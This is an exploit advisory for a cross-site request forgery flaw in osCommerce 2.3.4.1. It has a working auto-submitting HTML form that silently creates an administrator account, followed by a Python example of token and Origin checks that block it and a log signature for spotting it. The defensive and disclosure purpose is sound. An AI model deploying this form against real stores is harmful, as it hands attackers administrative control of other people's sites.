osCommerce 2.3.4.1 Cross Site Request Forgery

osCommerce version 2.3.4.1 suffers from a cross site request forgery vulnerability.


MD5 | 5ba0559ccd442984dcf1d43dc23a2084

# Exploit Title: osCommerce Add Admin User CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Download Link: https://www.oscommerce.com/Products&Download=oscom2341
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

exploit:

<html>
<!-- the page submits the hidden form to the admin endpoint as soon as it loads -->
<body onload="document.administrator.submit();">
<form name="administrator" action="http://localhost/osCommerce/admin/administrators.php?action=insert" method="post">
<input type="hidden" name="username" value="secuser" />
<input type="hidden" name="password" value="Your" />
<input type="hidden" name="htaccess" value="false" />
</form>
</body>
</html>
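The request above succeeds because the insert action accepts any POST that arrives with the admin's session cookie. The following is an added example of the server-side checks that would reject it; it is written in Python rather than osCommerce's PHP and is not osCommerce code. The request and session objects are plain dicts standing in for a web framework's, `SITE_ORIGIN` and the hostnames are constructed, and `handle_admin_insert` is a hypothetical handler for the `administrators.php?action=insert` endpoint. Two independent defences are applied: a per-session synchronizer token that a page on another origin cannot read, and an Origin/Referer check, since browsers attach an Origin header to cross-site form POSTs.

```python
"""Server-side CSRF defences for a state-changing admin action.

Added example, not osCommerce code: request and session are plain dicts,
SITE_ORIGIN is constructed, handle_admin_insert is hypothetical.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://shop.example"  # constructed: origin the admin panel is served from


def issue_csrf_token(session):
    """Create one random synchronizer token per session and reuse it for that session."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def render_hidden_field(session):
    """Hidden field the legitimate admin form embeds; a forged page on another origin cannot read it."""
    return '<input type="hidden" name="csrf_token" value="%s" />' % issue_csrf_token(session)


def origin_matches(headers):
    """Accept the POST only if its Origin (or, failing that, Referer) is the site itself.

    Browsers add Origin to cross-site POSTs, so an auto-submitting form hosted
    elsewhere is caught here. A missing header fails closed for state changes.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def token_matches(session, form):
    """Constant-time comparison of the submitted token with the session's token."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_admin_insert(request, session):
    """Hypothetical hardened handler for administrators.php?action=insert.

    Returns ("created", username) or ("rejected", reason).
    """
    if request["method"] != "POST":
        return ("rejected", "method")
    if not origin_matches(request["headers"]):
        return ("rejected", "origin")
    if not token_matches(session, request["form"]):
        return ("rejected", "csrf_token")
    return ("created", request["form"]["username"])


def demo():
    """Run the handler against a forged request and a legitimate one (both constructed)."""
    session = {}
    # Shaped like the auto-submitting form: cross-site Origin, no token.
    forged = {
        "method": "POST",
        "headers": {"Origin": "https://attacker.example"},
        "form": {"username": "secuser", "password": "Your", "htaccess": "false"},
    }
    # Shaped like the real admin form: same origin, token taken from the session.
    token = issue_csrf_token(session)
    legit = {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"username": "secuser", "password": "Your", "htaccess": "false",
                 "csrf_token": token},
    }
    return handle_admin_insert(forged, session), handle_admin_insert(legit, session)


if __name__ == "__main__":
    print(demo())
```

Either check alone stops the request shown above: the Origin check fails before the body is inspected, and even with a permissive proxy stripping Origin, the forged form carries no token. On the detection side, POSTs to `admin/administrators.php?action=insert` whose Origin or Referer is not the shop's own host are the access-log signature of this attack.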
